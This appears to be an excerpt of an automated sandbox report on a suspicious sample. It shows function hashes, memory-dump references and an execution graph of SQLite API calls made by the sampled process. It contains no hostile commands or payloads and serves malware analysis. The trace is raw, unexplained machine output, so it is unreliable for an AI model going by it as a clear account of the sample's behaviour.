                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                              • API String ID: 0-2877786613
                                                                                                              • Opcode ID: a86f913bf8f84f420332ccaffed976faa67f6dcdb7b671c0972d247f950e1729
                                                                                                              • Instruction ID: 25f90910bc2ee656aea38d43b6f0db2c5f6d7aca4b85c11e26bfe74e1ebeafcb
                                                                                                              • Opcode Fuzzy Hash: a86f913bf8f84f420332ccaffed976faa67f6dcdb7b671c0972d247f950e1729
                                                                                                              • Instruction Fuzzy Hash: E1312771A12229BAEB11EB90CC42FEF777D9F55A08F104149FA14BB180EB746A05C7A7
                                                                                                              Function 040B9B7D Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0$2$5$f
                                                                                                              • API String ID: 0-706407475
                                                                                                              • Opcode ID: 26634e405d40b8e98f1eef4edac67cd9666e5265d9bad8548b7823b9cd98e3a8
                                                                                                              • Instruction ID: 4abd0201226887fba3104a4239d9e63551cdf0acf7d4e28d36e2650f4672e6af
                                                                                                              • Opcode Fuzzy Hash: 26634e405d40b8e98f1eef4edac67cd9666e5265d9bad8548b7823b9cd98e3a8
                                                                                                              • Instruction Fuzzy Hash: 013112B1910119ABEB05DFA4CD41FFE77F9EF54308F008199E908B7240EB75AA058BE5
                                                                                                              Function 040A6E56 Relevance: 5.0, Strings: 4, Instructions: 28COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: %l`"$%l`"2$2$@l`$%&,!4%l`"2
                                                                                                              • API String ID: 0-2462281787
                                                                                                              • Opcode ID: 824cf1183d70a0fd72d210dcabc696742dd1701eacf40ccfa1035069a35b1547
                                                                                                              • Instruction ID: b04f9dcb28b6897cd489071aed98b0a00a17aca0dfc24b6ae358b84e2c5408ea
                                                                                                              • Opcode Fuzzy Hash: 824cf1183d70a0fd72d210dcabc696742dd1701eacf40ccfa1035069a35b1547
                                                                                                              • Instruction Fuzzy Hash: EBF0ECB580020C9ACB04DF94DD45AEE7F74FF04204F505998D9157B181E771A714C7F6

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:1.5%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:0.5%
                                                                                                              Total number of Nodes:408
                                                                                                              Total number of Limit Nodes:56
                                                                                                              execution_graph 32595 61e18cf7 32596 61e19041 32595->32596 32597 61e18d06 32595->32597 32597->32596 32598 61e18d28 sqlite3_mutex_enter 32597->32598 32599 61e18d4a 32598->32599 32605 61e18d67 32598->32605 32601 61e18d53 sqlite3_config 32599->32601 32599->32605 32600 61e18e14 sqlite3_mutex_leave sqlite3_mutex_enter 32602 61e18fe2 sqlite3_mutex_leave sqlite3_mutex_enter 32600->32602 32608 61e18e3f 32600->32608 32601->32605 32603 61e19020 sqlite3_mutex_leave 32602->32603 32604 61e19009 sqlite3_mutex_free 32602->32604 32603->32596 32604->32603 32605->32600 32606 61e18dcc sqlite3_mutex_leave 32605->32606 32606->32596 32608->32602 32609 61e18eab sqlite3_malloc 32608->32609 32611 61e18ed8 sqlite3_config 32608->32611 32612 61e18eec 32608->32612 32610 61e18f06 sqlite3_free sqlite3_os_init 32609->32610 32613 61e18eca 32609->32613 32610->32613 32611->32612 32612->32609 32612->32613 32613->32602 32614 61e0bce7 32615 61e0bdad 32614->32615 32616 61e0bcfc 32614->32616 32616->32615 32617 61e0bd32 32616->32617 32618 61e0b1d3 128 API calls 32616->32618 32624 61e0b1d3 32617->32624 32618->32617 32620 61e0bd4a 32620->32615 32621 61e0b1d3 128 API calls 32620->32621 32622 61e0bd7d 32621->32622 32622->32615 32623 61e0b1d3 128 API calls 32622->32623 32623->32615 32625 61e0b2f5 32624->32625 32627 61e0b1db 32624->32627 32625->32620 32626 61e0b1ee 32626->32620 32627->32626 32628 61e0b1d3 128 API calls 32627->32628 32630 61e63eda 32627->32630 32628->32627 32633 61e63fc9 32630->32633 32647 61e63f11 32630->32647 32633->32627 32634 61e64198 32657 61e292f0 sqlite3_free sqlite3_str_vappendf 32634->32657 32635 61e64334 32635->32633 32662 61e292f0 sqlite3_free sqlite3_str_vappendf 32635->32662 32640 61e64068 32658 61e292f0 sqlite3_free sqlite3_str_vappendf 32640->32658 32643 61e11fbb 128 API calls 32643->32647 32644 61e63fef 32644->32633 32644->32635 32644->32640 32645 61e297bd 9 API calls 32644->32645 32661 61e1502e 8 API calls 32644->32661 32645->32644 32646 61e0b1d3 128 API calls 32646->32647 32647->32633 32647->32634 32647->32640 32647->32643 32647->32644 32647->32646 32648 61e645eb 32647->32648 32651 61e63e96 32647->32651 32655 61e4c863 13 API calls 32647->32655 32656 61e4ca77 13 API calls 32647->32656 32659 61e59eb1 128 API calls 32647->32659 32660 61e2947a sqlite3_free sqlite3_str_vappendf 32647->32660 32663 61e292f0 sqlite3_free sqlite3_str_vappendf 32648->32663 32652 61e63eac 32651->32652 32664 61e63c32 32652->32664 32655->32647 32656->32647 32657->32633 32658->32633 32659->32647 32660->32647 32661->32644 32662->32633 32663->32633 32665 61e63c63 32664->32665 32666 61e63c4c 32664->32666 32696 61e63785 32665->32696 32676 61e63c6f 32666->32676 32700 61e03955 sqlite3_stricmp 32666->32700 32669 61e63d5f 32671 61e63e45 32669->32671 32672 61e63e6e 32669->32672 32669->32676 32670 61e63c59 32670->32669 32675 61e63c95 sqlite3_strnicmp 32670->32675 32681 61e63cef 32670->32681 32710 61e292f0 sqlite3_free sqlite3_str_vappendf 32671->32710 32711 61e292f0 sqlite3_free sqlite3_str_vappendf 32672->32711 32675->32669 32677 61e63cb8 32675->32677 32676->32647 32701 61e03ed7 sqlite3_stricmp 32677->32701 32679 61e63cc3 32679->32669 32702 61e1336b 11 API calls 32679->32702 32681->32669 32681->32676 32682 61e63d56 32681->32682 32683 61e63d64 32681->32683 32703 61e0f8ea sqlite3_free 32682->32703 32704 61e206da 8 API calls 32683->32704 32686 61e63d91 32705 61e206da 8 API calls 32686->32705 32688 61e63d9c 32706 61e206da 8 API calls 32688->32706 32690 61e63db0 32707 61e2d2fa 10 API calls 32690->32707 32692 61e63dcb 32692->32676 32708 61e292f0 sqlite3_free sqlite3_str_vappendf 32692->32708 32694 61e63ded 32709 61e0f8ea sqlite3_free 32694->32709 32697 61e63799 32696->32697 32698 61e63795 32696->32698 32712 61e636f2 32697->32712 32698->32666 32700->32670 32701->32679 32702->32681 32703->32669 32704->32686 32705->32688 32706->32690 32707->32692 32708->32694 32709->32669 32710->32676 32711->32676 32713 61e63728 32712->32713 32715 61e6371b 32712->32715 32718 61e633d6 32713->32718 32716 61e633d6 119 API calls 32715->32716 32717 61e6373f 32715->32717 32716->32715 32717->32698 32747 61e71dda 32718->32747 32723 61e63492 32724 61e634d1 32723->32724 32771 61e408ae 32723->32771 32732 61e634f4 32724->32732 32788 61e1409b sqlite3_mutex_leave sqlite3_mutex_try sqlite3_mutex_enter 32724->32788 32727 61e634ab 32727->32724 32728 61e634b8 32727->32728 32787 61e11f90 sqlite3_free 32728->32787 32730 61e63595 32790 61e11f90 sqlite3_free 32730->32790 32731 61e63576 32731->32730 32734 61e635ba 32731->32734 32732->32730 32732->32731 32789 61e144a7 sqlite3_mutex_leave sqlite3_mutex_try sqlite3_mutex_enter 32732->32789 32791 61e2d237 sqlite3_str_vappendf 32734->32791 32735 61e634c9 32746 61e63480 32735->32746 32796 61e1569c sqlite3_free sqlite3_free sqlite3_free sqlite3_free 32735->32796 32739 61e635f1 sqlite3_exec 32792 61e0f8ea sqlite3_free 32739->32792 32741 61e63647 32742 61e63655 32741->32742 32793 61e632fc sqlite3_stricmp sqlite3_free sqlite3_str_vappendf sqlite3_exec 32741->32793 32744 61e635a4 32742->32744 32794 61e156f5 7 API calls 32742->32794 32744->32735 32744->32746 32795 61e465ad 102 API calls 32744->32795 32746->32715 32748 61e71e0a 32747->32748 32750 61e71e1d 32747->32750 32797 61e2d24d sqlite3_log sqlite3_str_vappendf 32748->32797 32751 61e6345c 32750->32751 32752 61e71e32 sqlite3_strnicmp 32750->32752 32761 61e71e2b 32750->32761 32751->32735 32751->32746 32762 61e13d7f 32751->32762 32753 61e71e66 32752->32753 32752->32761 32755 61e71e7d sqlite3_prepare 32753->32755 32756 61e71ec0 32755->32756 32757 61e71efa sqlite3_finalize 32755->32757 32756->32757 32758 61e71ed4 32756->32758 32759 61e71ee6 sqlite3_errmsg 32756->32759 32757->32751 32758->32757 32798 61e2d24d sqlite3_log sqlite3_str_vappendf 32759->32798 32761->32751 32799 61e2d24d sqlite3_log sqlite3_str_vappendf 32761->32799 32763 61e13d97 32762->32763 32764 61e13d88 32762->32764 32763->32723 32764->32763 32765 61e13d0c sqlite3_mutex_try 32764->32765 32766 61e13d28 32765->32766 32767 61e13d36 32765->32767 32766->32723 32768 61e13d5c sqlite3_mutex_enter 32767->32768 32800 61e02864 sqlite3_mutex_leave 32767->32800 32769 61e13d4f 32768->32769 32769->32766 32769->32768 32772 61e13d7f 3 API calls 32771->32772 32783 61e408c7 32772->32783 32774 61e40de5 32774->32727 32777 61e40dea 32777->32774 32830 61e12ea8 9 API calls 32777->32830 32778 61e409e3 memcmp 32778->32783 32779 61e40a34 memcmp 32779->32783 32780 61e40cef memcmp 32780->32783 32781 61e40ab9 memcmp 32781->32783 32783->32774 32783->32777 32783->32778 32783->32779 32783->32780 32783->32781 32801 61e3f98c 32783->32801 32823 61e02c3f 32783->32823 32826 61e937c8 50 API calls 32783->32826 32827 61e0b03d sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 32783->32827 32828 61e14660 15 API calls 32783->32828 32829 61e2666a sqlite3_log 32783->32829 32787->32735 32789->32731 32790->32744 32791->32739 32792->32741 32793->32742 32794->32744 32795->32735 32796->32746 32797->32751 32798->32757 32799->32751 32800->32767 32814 61e3fcf1 32801->32814 32815 61e3f9a4 32801->32815 32802 61e3fda3 32802->32783 32804 61e3fc22 32804->32802 32841 61e134ff sqlite3_free sqlite3_free 32804->32841 32806 61e014e3 17 API calls 32807 61e3fc5b 32806->32807 32807->32804 32808 61e3fc76 memcmp 32807->32808 32813 61e3fc94 32808->32813 32809 61e3fbd5 32809->32804 32822 61e3faaf 32809->32822 32838 61e3ed89 73 API calls 32809->32838 32810 61e3f9ca 32810->32804 32810->32809 32812 61e01617 48 API calls 32810->32812 32810->32822 32816 61e3fbbf 32812->32816 32813->32814 32839 61e937c8 50 API calls 32813->32839 32814->32804 32840 61e32ffb 33 API calls 32814->32840 32815->32804 32815->32810 32820 61e3fa61 32815->32820 32815->32822 32834 61e01617 32815->32834 32816->32809 32837 61e281da sqlite3_log 32816->32837 32820->32810 32820->32822 32831 61e014e3 32820->32831 32822->32804 32822->32806 32822->32813 32842 61e02627 32823->32842 32825 61e02c5f 32825->32783 32826->32783 32827->32783 32828->32783 32829->32783 32830->32774 32833 61e263f2 17 API calls 32831->32833 32832 61e0150a 32832->32810 32833->32832 32836 61e3d4d3 48 API calls 32834->32836 32835 61e01640 32835->32820 32836->32835 32837->32809 32838->32822 32839->32814 32840->32814 32841->32802 32844 61e3f370 73 API calls 32842->32844 32843 61e02646 32843->32825 32844->32843 32845 61e19146 GetSystemInfo sqlite3_vfs_register sqlite3_vfs_register sqlite3_vfs_register sqlite3_vfs_register 32846 61e191c1 32845->32846 32847 61e91b73 sqlite3_initialize 32848 61e91b91 32847->32848 32849 61e91c02 32847->32849 32855 61e1ec19 10 API calls 32848->32855 32851 61e91bdf 32973 61e10635 sqlite3_free 32851->32973 32852 61e91bbc 32852->32851 32856 61e90e13 sqlite3_initialize 32852->32856 32855->32852 32857 61e91b35 32856->32857 32858 61e90e49 32856->32858 32857->32851 32974 61e12b8f 32858->32974 32860 61e91b27 32861 61e91aea sqlite3_errcode 32860->32861 32865 61e91af9 sqlite3_close 32861->32865 32866 61e91b05 32861->32866 32862 61e90ecb sqlite3_mutex_enter 32977 61e2900a 32862->32977 32863 61e90e9f 32863->32860 32863->32862 32869 61e90ebe sqlite3_free 32863->32869 32868 61e91b10 sqlite3_free 32865->32868 32866->32868 32868->32857 32869->32860 32870 61e2900a 15 API calls 32871 61e90fee 32870->32871 32872 61e2900a 15 API calls 32871->32872 32873 61e91016 32872->32873 32874 61e2900a 15 API calls 32873->32874 32875 61e9103e 32874->32875 32876 61e2900a 15 API calls 32875->32876 32877 61e91066 32876->32877 32878 61e91adf sqlite3_mutex_leave 32877->32878 32988 61e12960 32877->32988 32878->32861 32881 61e910aa 33071 61e397b2 13 API calls 32881->33071 32882 61e9109e 33070 61e25225 sqlite3_log 32882->33070 32885 61e910a8 32886 61e910cf 32885->32886 32887 61e91111 32885->32887 33072 61e28b14 11 API calls 32886->33072 32994 61e47732 32887->32994 32891 61e91101 sqlite3_free 32891->32878 32892 61e9113c 32894 61e0ffa2 sqlite3_free 32892->32894 32893 61e91157 32895 61e13d7f 3 API calls 32893->32895 32896 61e91152 32894->32896 32897 61e91162 32895->32897 32896->32878 33056 61e165db 32897->33056 32899 61e9116f 32900 61e165db 3 API calls 32899->32900 32901 61e91198 32900->32901 32901->32878 33060 61e0ffa2 32901->33060 32904 61e911ed 32905 61e911f4 sqlite3_errcode 32904->32905 32906 61e91208 32905->32906 32907 61e91517 32905->32907 32908 61e91810 32906->32908 32909 61e91210 sqlite3_malloc 32906->32909 32910 61e9153a 32907->32910 32912 61e91528 sqlite3_errcode 32907->32912 32921 61e91550 sqlite3_mutex_enter 32907->32921 32935 61e91575 sqlite3_mutex_leave 32907->32935 32939 61e915c3 sqlite3_free 32907->32939 33075 61e28b14 11 API calls 32907->33075 32913 61e91822 sqlite3_create_function 32908->32913 32951 61e91942 32908->32951 32909->32908 32911 61e9122a 32909->32911 32910->32908 32915 61e915ee sqlite3_create_module 32910->32915 33073 61e253a1 15 API calls 32911->33073 32912->32878 32912->32910 32917 61e9186c sqlite3_create_function 32913->32917 32913->32951 32915->32908 32920 61e91618 sqlite3_malloc 32915->32920 32916 61e91a43 32918 61e91a4e 32916->32918 32923 61e0ffa2 sqlite3_free 32916->32923 32922 61e918b6 sqlite3_create_function 32917->32922 32917->32951 33064 61e1427e 32918->33064 32919 61e91275 32919->32910 32924 61e9127f sqlite3_create_function 32919->32924 32926 61e91633 32920->32926 32920->32951 32921->32907 32930 61e918fc 32922->32930 32922->32951 32923->32918 32924->32910 32931 61e912c9 sqlite3_create_function 32924->32931 33076 61e1b691 8 API calls 32926->33076 32927 61e91a65 sqlite3_wal_autocheckpoint 32927->32878 32929 61e919aa 32940 61e91a0d 32929->32940 32943 61e919ba sqlite3_create_window_function 32929->32943 33080 61e253a1 15 API calls 32930->33080 32931->32910 32932 61e9130f sqlite3_create_function 32931->32932 32932->32910 32937 61e91359 32932->32937 32933 61e9166c 32938 61e91ac0 32933->32938 33077 61e1b691 8 API calls 32933->33077 32934 61e91966 sqlite3_create_function 32934->32951 32935->32907 32935->32939 32948 61e91373 sqlite3_create_function 32937->32948 32958 61e913b7 32937->32958 33083 61e09fc1 sqlite3_free sqlite3_free sqlite3_free 32938->33083 32939->32907 32944 61e915d7 32939->32944 32940->32916 32950 61e91a18 sqlite3_create_module 32940->32950 32941 61e9191c 32941->32951 33081 61e253a1 15 API calls 32941->33081 32943->32929 32944->32912 32945 61e9168c 32945->32938 33078 61e1b691 8 API calls 32945->33078 32948->32937 32949 61e91acf sqlite3_free 32949->32908 32950->32940 32951->32916 32951->32929 32951->32934 32954 61e916ac 32954->32938 32955 61e916b4 sqlite3_create_function 32954->32955 32955->32938 32956 61e916fa sqlite3_create_function 32955->32956 32956->32938 32957 61e91740 sqlite3_overload_function 32956->32957 32957->32938 32959 61e91762 sqlite3_overload_function 32957->32959 32958->32910 33074 61e253a1 15 API calls 32958->33074 32959->32938 32961 61e91784 sqlite3_overload_function 32959->32961 32961->32938 32963 61e917a6 sqlite3_overload_function 32961->32963 32962 61e91483 32962->32910 32964 61e9148d sqlite3_create_function 32962->32964 32963->32938 32965 61e917c8 sqlite3_overload_function 32963->32965 32964->32908 32966 61e914d6 sqlite3_create_function 32964->32966 32965->32938 32967 61e917ea 32965->32967 32966->32907 33079 61e253a1 15 API calls 32967->33079 32969 61e91806 32969->32908 33082 61e253a1 15 API calls 32969->33082 32971 61e91a93 32971->32908 32972 61e91a9d sqlite3_create_module 32971->32972 32972->32908 32973->32849 33084 61e10bf1 32974->33084 32978 61e29041 32977->32978 32979 61e12960 11 API calls 32978->32979 32980 61e2906a 32979->32980 32983 61e290ce 32980->32983 32987 61e29070 32980->32987 32981 61e12960 11 API calls 32982 61e29083 32981->32982 32984 61e290b8 32982->32984 32986 61e0ffa2 sqlite3_free 32982->32986 33098 61e28b14 11 API calls 32983->33098 32984->32870 32986->32984 32987->32981 32989 61e129ee 32988->32989 32990 61e12973 32988->32990 32989->32881 32989->32882 32990->32989 33099 61e127c1 10 API calls 32990->33099 32992 61e129d8 32992->32989 33100 61e0f8ea sqlite3_free 32992->33100 32995 61e47754 strcmp 32994->32995 32996 61e4777e 32994->32996 32995->32996 33028 61e47a9a 32995->33028 32997 61e12b8f 6 API calls 32996->32997 32996->33028 33008 61e477de 32997->33008 32998 61e12b8f 6 API calls 32999 61e47c67 32998->32999 33001 61e47c6d 32999->33001 33002 61e47c7f 32999->33002 33000 61e483ea 33000->32892 33000->32893 33105 61e0f8ea sqlite3_free 33001->33105 33005 61e47d86 33002->33005 33106 61e0f8ea sqlite3_free 33002->33106 33003 61e47a1e 33007 61e12b8f 6 API calls 33003->33007 33006 61e47e4f 33005->33006 33011 61e01617 48 API calls 33005->33011 33107 61e14660 15 API calls 33006->33107 33017 61e47a36 33007->33017 33008->33000 33008->33003 33015 61e10bf1 6 API calls 33008->33015 33023 61e47ddb 33011->33023 33012 61e48280 33013 61e48285 sqlite3_free sqlite3_free 33012->33013 33051 61e4823c 33013->33051 33014 61e47c7a 33014->33013 33110 61e47640 91 API calls 33014->33110 33016 61e47871 33015->33016 33019 61e47887 sqlite3_free 33016->33019 33020 61e47899 33016->33020 33017->33012 33027 61e10bf1 6 API calls 33017->33027 33017->33028 33019->33000 33022 61e478a2 33020->33022 33031 61e478d3 sqlite3_free sqlite3_free 33020->33031 33021 61e482e0 sqlite3_mutex_leave 33021->33000 33032 61e47904 sqlite3_mutex_enter 33022->33032 33024 61e47eb2 33023->33024 33025 61e47e26 sqlite3_uri_boolean 33023->33025 33033 61e47bda 33024->33033 33108 61e0aaaf sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 33024->33108 33025->33006 33030 61e47e55 sqlite3_uri_boolean 33025->33030 33048 61e47b02 33027->33048 33028->32998 33028->33014 33029 61e47f53 sqlite3_free 33029->33033 33030->33006 33031->33000 33101 61e01713 33032->33101 33033->33014 33039 61e014e3 17 API calls 33033->33039 33043 61e48075 33033->33043 33036 61e4792b 33037 61e47a01 sqlite3_mutex_leave sqlite3_free 33036->33037 33038 61e4793e strcmp 33036->33038 33042 61e4796e 33036->33042 33037->33003 33054 61e48196 33037->33054 33038->33036 33039->33043 33040 61e13d7f 3 API calls 33040->33051 33041 61e479df 33041->33037 33042->33041 33046 61e479a3 sqlite3_mutex_leave sqlite3_mutex_leave sqlite3_free sqlite3_free 33042->33046 33043->33014 33052 61e48349 33043->33052 33109 61e14660 15 API calls 33043->33109 33044 61e47bcd 33104 61e0f8ea sqlite3_free 33044->33104 33046->33000 33048->33014 33048->33028 33048->33044 33103 61e281da sqlite3_log 33048->33103 33049 61e4815b 33049->33014 33049->33052 33049->33054 33051->33000 33051->33021 33052->33014 33055 61e4838c sqlite3_mutex_enter sqlite3_mutex_leave 33052->33055 33053 61e47bbb 33053->33028 33053->33044 33054->33040 33055->33052 33057 61e165ea 33056->33057 33059 61e165f6 33056->33059 33058 61e13d7f 3 API calls 33057->33058 33058->33059 33059->32899 33063 61e0ff78 33060->33063 33061 61e0ffb8 sqlite3_overload_function 33061->32904 33061->32905 33063->33060 33063->33061 33111 61e0ff31 sqlite3_free 33063->33111 33065 61e14291 33064->33065 33066 61e142d0 sqlite3_free 33065->33066 33067 61e142de 33065->33067 33069 61e14310 33065->33069 33066->33067 33068 61e10bf1 6 API calls 33067->33068 33067->33069 33068->33069 33069->32927 33070->32885 33071->32885 33072->32891 33073->32919 33074->32962 33075->32939 33076->32933 33077->32945 33078->32954 33079->32969 33080->32941 33081->32951 33082->32971 33083->32949 33085 61e10c0d 33084->33085 33086 61e10ce1 33084->33086 33085->33086 33087 61e10c28 sqlite3_mutex_enter 33085->33087 33086->32863 33090 61e10c3e 33087->33090 33088 61e10c95 33094 61e265e6 malloc 33088->33094 33089 61e10cd0 sqlite3_mutex_leave 33089->33086 33090->33088 33097 61e09d45 sqlite3_mutex_leave sqlite3_mutex_enter 33090->33097 33092 61e10caa 33092->33089 33095 61e2660c sqlite3_log 33094->33095 33096 61e265ff 33094->33096 33095->33096 33096->33092 33097->33088 33098->32984 33099->32992 33100->32989 33102 61e0171c sqlite3_mutex_enter 33101->33102 33102->33036 33103->33053 33104->33033 33105->33014 33106->33005 33107->33024 33108->33029 33109->33049 33110->33012 33111->33063

                                                                                                              Executed Functions

                                                                                                              Function 61E90E13 Relevance: 100.5, APIs: 39, Strings: 18, Instructions: 767COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 61e90e13-61e90e43 sqlite3_initialize 1 61e90e49-61e90e55 0->1 2 61e91b35-61e91b3f 0->2 3 61e90e6d-61e90e72 1->3 4 61e90e57-61e90e5a 1->4 6 61e90e7b-61e90e82 3->6 7 61e90e74-61e90e79 3->7 4->3 5 61e90e5c-61e90e66 4->5 5->3 9 61e90e8c-61e90ea3 call 61e12b8f 6->9 10 61e90e84 6->10 8 61e90e89 7->8 8->9 13 61e90ea9-61e90eab 9->13 14 61e91b27-61e91b29 9->14 10->8 16 61e90ecb-61e9106a sqlite3_mutex_enter call 61e2900a * 5 13->16 17 61e90ead-61e90ebc call 61e01713 13->17 15 61e91aea-61e91af7 sqlite3_errcode 14->15 20 61e91af9-61e91b03 sqlite3_close 15->20 21 61e91b05-61e91b07 15->21 35 61e91adf-61e91ae5 sqlite3_mutex_leave 16->35 36 61e91070-61e9109c call 61e12960 16->36 17->16 26 61e90ebe-61e90ec6 sqlite3_free 17->26 24 61e91b10-61e91b25 sqlite3_free 20->24 21->24 25 61e91b09 21->25 24->2 25->24 26->14 35->15 39 61e910aa-61e910c4 call 61e397b2 36->39 40 61e9109e-61e910a8 call 61e25225 36->40 44 61e910c9-61e910cd 39->44 40->44 45 61e910cf-61e910d2 44->45 46 61e91111-61e9113a call 61e47732 44->46 48 61e910db-61e9110c call 61e28b14 sqlite3_free 45->48 49 61e910d4-61e910d6 call 61e0a70a 45->49 54 61e9113c-61e91152 call 61e0ffa2 46->54 55 61e91157-61e91179 call 61e13d7f call 61e165db 46->55 48->35 49->48 54->35 62 61e9117b-61e91181 55->62 63 61e91184-61e911c1 call 61e0af75 call 61e165db 55->63 62->63 63->35 68 61e911c7-61e911eb call 61e0ffa2 sqlite3_overload_function 63->68 71 61e911ed-61e911ef call 61e0a70a 68->71 72 61e911f4-61e91202 sqlite3_errcode 68->72 71->72 74 61e91208-61e9120a 72->74 75 61e91517-61e91519 72->75 76 61e91810-61e91814 74->76 77 61e91210-61e91224 sqlite3_malloc 74->77 78 61e915dc-61e915e0 75->78 79 61e9151f-61e91526 75->79 80 61e9181a-61e9181c 76->80 81 61e91944-61e91948 76->81 82 61e91b2b-61e91b30 77->82 83 61e9122a-61e91279 call 61e253a1 77->83 78->76 86 61e915e6-61e915e8 78->86 84 61e91528-61e91534 sqlite3_errcode 79->84 85 61e9153f-61e91544 79->85 80->81 87 61e91822-61e91866 sqlite3_create_function 80->87 91 61e9194e-61e91950 81->91 92 61e91a43-61e91a45 81->92 82->76 83->78 105 61e9127f-61e912c3 sqlite3_create_function 83->105 84->35 89 61e9153a 84->89 93 61e91546-61e91564 call 61e01713 sqlite3_mutex_enter 85->93 86->76 90 61e915ee-61e91612 sqlite3_create_module 86->90 87->81 94 61e9186c-61e918b0 sqlite3_create_function 87->94 89->78 90->76 98 61e91618-61e9162d sqlite3_malloc 90->98 96 61e91a47-61e91a49 call 61e0ffa2 91->96 99 61e91956-61e9195b 91->99 95 61e91a4e-61e91a60 call 61e1427e 92->95 92->96 112 61e91571-61e91573 93->112 113 61e91566-61e9156f 93->113 94->81 103 61e918b6-61e918fa sqlite3_create_function 94->103 108 61e91a65-61e91a75 sqlite3_wal_autocheckpoint 95->108 96->95 98->81 107 61e91633-61e9166e call 61e1b691 98->107 101 61e9195d-61e91960 99->101 110 61e919aa-61e919af 101->110 111 61e91962-61e91964 101->111 103->81 114 61e918fc-61e91920 call 61e253a1 103->114 105->78 115 61e912c9-61e91309 sqlite3_create_function 105->115 123 61e91ac0 107->123 124 61e91674-61e9168e call 61e1b691 107->124 108->35 120 61e919b1-61e919b4 110->120 111->110 118 61e91966-61e919a8 sqlite3_create_function 111->118 119 61e91575-61e9158c sqlite3_mutex_leave 112->119 113->119 114->81 136 61e91922-61e91942 call 61e253a1 114->136 115->78 116 61e9130f-61e91353 sqlite3_create_function 115->116 116->78 122 61e91359-61e91368 116->122 118->101 125 61e9158e-61e915a4 119->125 126 61e915c3-61e915d1 sqlite3_free 119->126 127 61e91a0d 120->127 128 61e919b6-61e919b8 120->128 130 61e9136a-61e9136c 122->130 132 61e91ac5-61e91ada call 61e09fc1 sqlite3_free 123->132 124->123 145 61e91694-61e916ae call 61e1b691 124->145 125->126 147 61e915a6-61e915be call 61e28b14 125->147 126->93 135 61e915d7 126->135 134 61e91a0f-61e91a12 127->134 128->127 133 61e919ba-61e91a0b sqlite3_create_window_function 128->133 137 61e9136e-61e91371 130->137 138 61e913b7-61e913b9 130->138 132->76 133->120 134->92 142 61e91a14-61e91a16 134->142 135->84 136->81 137->138 144 61e91373-61e913b5 sqlite3_create_function 137->144 138->78 146 61e913bf-61e913d1 138->146 142->92 149 61e91a18-61e91a41 sqlite3_create_module 142->149 144->130 145->123 157 61e916b4-61e916f4 sqlite3_create_function 145->157 152 61e913d3-61e913d5 146->152 147->126 149->134 155 61e91409-61e9140b 152->155 156 61e913d7-61e913da 152->156 155->78 159 61e91411-61e91423 155->159 156->155 158 61e913dc-61e91407 156->158 157->132 160 61e916fa-61e9173a sqlite3_create_function 157->160 158->152 161 61e91425-61e91427 159->161 160->132 162 61e91740-61e9175c sqlite3_overload_function 160->162 164 61e91429-61e9142c 161->164 165 61e9145c-61e9145e 161->165 162->132 168 61e91762-61e9177e sqlite3_overload_function 162->168 164->165 166 61e9142e-61e9145a 164->166 165->78 167 61e91464-61e91487 call 61e253a1 165->167 166->161 167->78 174 61e9148d-61e914d0 sqlite3_create_function 167->174 168->132 170 61e91784-61e917a0 sqlite3_overload_function 168->170 170->132 173 61e917a6-61e917c2 sqlite3_overload_function 170->173 173->132 175 61e917c8-61e917e4 sqlite3_overload_function 173->175 174->76 176 61e914d6-61e91515 sqlite3_create_function 174->176 175->132 177 61e917ea-61e9180a call 61e253a1 175->177 176->75 177->76 180 61e91a77-61e91a97 call 61e253a1 177->180 180->76 183 61e91a9d-61e91abb sqlite3_create_module 180->183 183->76
                                                                                                              APIs
                                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E90E3C
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18D2E
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E20D02), ref: 61E18D62
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E1903A
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E90EC1
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E90ED6
                                                                                                                • Part of subcall function 61E397B2: memcmp.MSVCRT ref: 61E39800
                                                                                                                • Part of subcall function 61E397B2: sqlite3_malloc64.SQLITE3 ref: 61E39834
                                                                                                              • sqlite3_create_function.SQLITE3 ref: 61E9185D
                                                                                                              • sqlite3_create_function.SQLITE3 ref: 61E918A7
                                                                                                              • sqlite3_create_function.SQLITE3 ref: 61E918F1
                                                                                                              • sqlite3_create_function.SQLITE3 ref: 61E919A1
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E91AE5
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E91107
